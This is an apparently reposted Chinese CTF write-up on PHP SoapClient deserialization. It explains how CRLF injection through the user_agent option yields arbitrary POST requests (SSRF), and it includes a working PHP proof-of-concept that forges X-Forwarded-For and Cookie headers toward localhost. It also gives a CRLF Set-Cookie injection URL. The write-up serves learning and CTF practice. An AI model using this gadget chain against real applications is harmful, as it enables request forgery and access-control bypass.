采用HTTP作为底层通讯协议,XML作为数据传送的格式,正常情况下的SoapClient类,调用一个不存在的函数,会去调用__call方法。

https://www.w3.org/TR/2000/NOTE-SOAP-20000508/#_Toc478383528

以下是发送到WebXml.com.cn的SOAP请求,用于查询广东省支持的城市

POST /WebServices/WeatherWebService.asmx HTTP/1.1  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; MS Web Services Client Protocol 2.0.50727.3603)  
Content-Type: text/xml; charset=utf-8  
SOAPAction: "http://WebXml.com.cn/getSupportCity"  
Host: www.webxml.com.cn  
Content-Length: 348  
Expect: 100-continue  
Connection: Keep-Alive  <?xml version="1.0" encoding="utf-8"?>  
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"   xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"   xmlns:xsd="http://www.w3.org/2001/XMLSchema">  <soap:Body>  <getSupportCity xmlns="http://WebXml.com.cn/">  <byProvinceName>广东</byProvinceName>  </getSupportCity>  </soap:Body>  
</soap:Envelope>  

其中

POST请求的URL指向的是SOAP服务的端点,即服务器上处理SOAP请求的具体位置。

SOAPAction HTTP头部用于指示客户端想要调用的SOAP操作的URI。

CRLF漏洞

又称HTTP响应拆分漏洞(HRS),CRLF是\r\n(回车换行)的简称。

HTTP协议中,HTTP Header与HTTP Body使用两个CRLF分隔的,浏览器就是根据这两个CRLF来取出HTTP内容。

所以我们可以以类似http://127.0.0.1/%0d%0aSet-Cookie:%20a=1的方式注入Set-Cookie

SOAPAction可控,则存在CRLF漏洞,POST请求的header可控。

Content-TypeSOAPAction的上面,就无法控制Content-Type,也就不能控制POST的数据。

在header里User-AgentContent-Type前面,user_agent同样可以注入CRLF,控制Content-Type的值。

php.ini 去除extension=php_soap.dll或者extension=soap的注释。

<?php$target = 'http://127.0.0.1:999/';
$post_string = 'data=something';
$headers = array('X-Forwarded-For: 127.0.0.1',//client1, proxy1, proxy2, proxy3//'127.0.0.1,127.0.0.1,127.0.0.1,127.0.0.1'手动占位'Cookie: PHPSESSID=my_session');
$b = new SoapClient(null,array('location' => $target,'user_agent'=>'cllsse^^Content-Type: application/x-www-form-urlencoded^^'.join('^^',$headers).'^^Content-Length: '.(string)strlen($post_string).'^^^^'.$post_string,'uri'=> "aaab"));$aaa = serialize($b);
$aaa = str_replace('^^',"\r\n",$aaa);
$aaa = str_replace('&','&',$aaa);
echo $aaa;echo '<br>';
//echo urlencode($aaa);$c = unserialize($aaa);
$c->not_exists_function();//SoapClient类调用一个不存在的函数,会去调用__call()方法
?>

如上,使用SoapClient反序列化+CRLF可以生成任意POST请求

Deserialization + __call + SoapClient + CRLF = SSRF

如果发送到 Cloudflare 的请求中不含现有的 X-Forwarded-For 标头,X-Forwarded-For 将具有与 CF-Connecting-IP 标头相同的值

示例:X-Forwarded-For:203.0.113.1

如果发送到 Cloudflare 的请求中已存在 X-Forwarded-For 标头,则 Cloudflare 会将 HTTP 代理的 IP 地址附加到这个标头:

示例:X-Forwarded-For:203.0.113.1,198.51.100.101,198.51.100.102

在这里插入图片描述

参考了 ctfshow web259(soapclient+crlf)

回头可以去试试探姬的反序列化靶场。

参考文章

  1. CTF中常用PHP特性总结 gxngxngxn

  2. 反序列化 Lazzaro

  3. curl命令详解 魔降风云变

  4. php伪协议详解 小哥不太逍遥

  5. php伪协议 lorexxar

  6. 浅析命令执行 quan9i

  7. PHP反序列化基础完全解析 kengwang

  8. 带你走进PHP session反序列化漏洞 panda

  9. SOAP和WSDL的一些必要知识(转) - 红无酒伤 - 博客园 (cnblogs.com)

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.rhkb.cn/news/378307.html

如若内容造成侵权/违法违规/事实不符,请联系长河编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

用switch实现多分支选择结构

一 例子引入 #include<stdio.h> int main&#xff08;) {char grade&#xff1b;scanf("%c"&#xff0c;&grade);printf("Your score:");switch (grade){case A: printf("85~100\n"); break;case B: printf("70~84\n");br…

深度学习落地实战:识别火车票信息

前言 大家好&#xff0c;我是机长 本专栏将持续收集整理市场上深度学习的相关项目&#xff0c;旨在为准备从事深度学习工作或相关科研活动的伙伴&#xff0c;储备、提升更多的实际开发经验&#xff0c;每个项目实例都可作为实际开发项目写入简历&#xff0c;且都附带完整的代…

嵌入式人工智能(9-基于树莓派4B的PWM-LED呼吸灯)

1、PWM简介 (1)、什么是PWM 脉冲宽度调制(PWM)&#xff0c;是英文“Pulse Width Modulation”的缩写&#xff0c;简称脉宽调制&#xff0c;是在具有惯性的系统中利用微处理器的数字输出来对模拟电路进行控制的一种非常有效的技术&#xff0c;广泛应用在从测量、通信到功率控制…

在 Linux 系统中安装MySQL 8.x(Ubuntu和CentOS)

文章目录 0. 前言1. 查看 Linux 的发行版本2. 在 Ubuntu 中安装MySQL 8.x2.1 更新包索引2.1.1 更改 Ubuntu 的镜像源2.1.2 更新软件包、升级软件包&#xff08;耗时可能较长&#xff09;2.1.3 可能遇到的问题 2.2 安装MySQL2.3 安全配置2.3.1 密码安全级别2.3.2 删除匿名用户2.…

华为HCIP Datacom H12-821 卷41

1.多选题 以下关于BGP Atomic_Aggregate和Aggregator的描述&#xff0c;正确的是哪些项? A、Aggregator属性属于可选过渡属性 B、Atomic_Aggregate属于公认任意属性 C、收到携带Atomic_Aggregate属性的路由表示这条路由不能再度明细化 D、 Agregator表示某条路由可能出现…

各类专业技术的pdf电子书

从业多年&#xff0c;收集了海量的pdf电子书籍&#xff0c;感兴趣的私聊。

设计模式学习(二)工厂模式——抽象工厂模式+注册表

设计模式学习&#xff08;二&#xff09;工厂模式——抽象工厂模式注册表 前言使用简单工厂改进使用注册表改进参考文章 前言 在上一篇文章中我们提到了抽象工厂模式初版代码的一些缺点&#xff1a;①客户端违反开闭原则②提供方违反开闭原则。本文将针对这两点进行讨论 使用…

【node-RED 4.0.2】连接 Oracle 数据库踩坑解决,使用模组:node-red-contrib-agur-connector

关于 Oracle Oracle 就好像一张吸满水的面巾纸&#xff0c;你稍一用力它就烂了。 PS&#xff1a;我更新了更好的模组的教程&#xff0c;这篇已经是旧款的教程&#xff0c;但是它仍旧包含了必要的配置环境变量等操作。 最新的模组教程&#xff1a;node-red-contrib-agur-connec…

数据湖仓一体(一) 编译hudi

目录 一、大数据组件版本信息 二、数据湖仓架构 三、数据湖仓组件部署规划 四、编译hudi 一、大数据组件版本信息 hudi-0.14.1zookeeper-3.5.7seatunnel-2.3.4kafka_2.12-3.5.2hadoop-3.3.5mysql-5.7.28apache-hive-3.1.3spark-3.3.1flink-1.17.2apache-dolphinscheduler-3.1.9…

基于AT89C51单片机的16×16点阵LED显示器字符滚动显示设计(含文档、源码与proteus仿真,以及系统详细介绍)

本篇文章论述的是基于AT89C51单片机的1616点阵LED显示器字符滚动显示设计的详情介绍&#xff0c;如果对您有帮助的话&#xff0c;还请关注一下哦&#xff0c;如果有资源方面的需要可以联系我。 目录 仿真效果图 仿真图 代码 系统论文 资源下载 设计的内容和要求 熟悉51系…

基于视觉工具箱和背景差法的行人检测,行走轨迹跟踪,人员行走习惯统计matlab仿真

目录 1.算法运行效果图预览 2.算法运行软件版本 3.部分核心程序 4.算法理论概述 5.算法完整程序工程 1.算法运行效果图预览 (完整程序运行后无水印) 在三维图中&#xff0c;幅度越大&#xff0c;则表示人员更习惯的行走路线。 2.算法运行软件版本 matlab2022a 3.部分核…

css基础(1)

CSS CCS Syntax CSS 规则由选择器和声明块组成。 CSS选择器 CSS选择器用于查找想要设置样式的HTML元素 一般选择器分为五类 Simple selectors (select elements based on name, id, class) 简单选择器&#xff08;根据名称、id、类选择元素&#xff09; //页面上的所有 …

【经验分享】关于静态分析工具排查 Bug 的方法

文章目录 编译器的静态分析cppcheck安装 cppcheck运行 cppcheck 程序员的日常工作&#xff0c;不是摸鱼扯皮&#xff0c;就是在写 Bug。虽然这是一个梗&#xff0c;但也可以看出&#xff0c;程序员的日常一定绕不开 Bug。而花更少的时间修复软件中的 Bug&#xff0c;且不引入新…

Bug:时间字段显示有问题

Bug&#xff1a;时间字段显示有问题 文章目录 Bug&#xff1a;时间字段显示有问题1、问题2、解决方法一&#xff1a;添加注解3、解决方法二&#xff1a;消息转换器自定义对象映射器配置消息转换器 1、问题 ​ 在后端传输时间给前端的时候&#xff0c;发现前端的时间显示有问题…

汽车开发阶段(OTS/VFF/PVS/OS/SOP)

OTS&#xff1a;即英语中的Off Tooling Sample&#xff0c;通常被称为工装样件。它指的是通过配套设备、工装夹具以及模具制造出来的样品&#xff0c;但并不强调生产的时间效率&#xff0c;主要用于验证产品的设计能力。 VFF&#xff1a;在德语中表示为Vorserien Freigabefahr…

太速科技-FMC207-基于FMC 两路QSFP+光纤收发子卡

FMC207-基于FMC 两路QSFP光纤收发子卡 一、板卡概述 本卡是一个FPGA夹层卡&#xff08;FMC&#xff09;模块&#xff0c;可提供高达2个QSFP / QSFP 模块接口&#xff0c;直接插入千兆位级收发器&#xff08;MGT&#xff09;的赛灵思FPGA。支持利用Spartan-6、Virtex-6、Kin…

eNsp公司管理的网络NAT策略搭建

实验拓扑图 实验需求&#xff1a; 7&#xff0c;办公区设备可以通过电信链路和移动链路上网(多对多的NAT&#xff0c;并且需要保留一个公网IP不能用来转换) 8&#xff0c;分公司设备可以通过总公司的移动链路和电信链路访问到Dmz区的http服务器 9&#xff0c;多出口环境基于带…

JavaWeb(四:Ajax与Json)

一、Ajax 1.定义 Ajax&#xff08;Asynchronous JavaScript And XML&#xff09;&#xff1a;异步的 JavaScript 和 XML AJAX 不是新的编程语言&#xff0c;指的是⼀种交互方式&#xff1a;异步加载。 客户端和服务器的数据交互更新在局部页面的技术&#xff0c;不需要刷新…

VUE:跨域配置代理服务器

//在vite.config。js中&#xff0c;同插件配置同级进行配置server:{proxy:{"/myrequest":{//代理域名&#xff0c;可自行修改target:"https://m.wzj.com/",//访问服务器的目标域名changeOrigin:true,//允许跨域configure:(proxy,options) > {proxy.on(&…

未知物材料成分配方检测分析

材料成分配方分析是一种通过分析材料的化学成分、结构和性质来确定其组成和配方的方法。这对于产品质量控制、新产品研发、工业问题解决和环保等领域具有重要意义。进行材料成分配方分析通常需要以下步骤&#xff1a; 1. 样品采集&#xff1a;采集需要分析的材料样品&#xff0…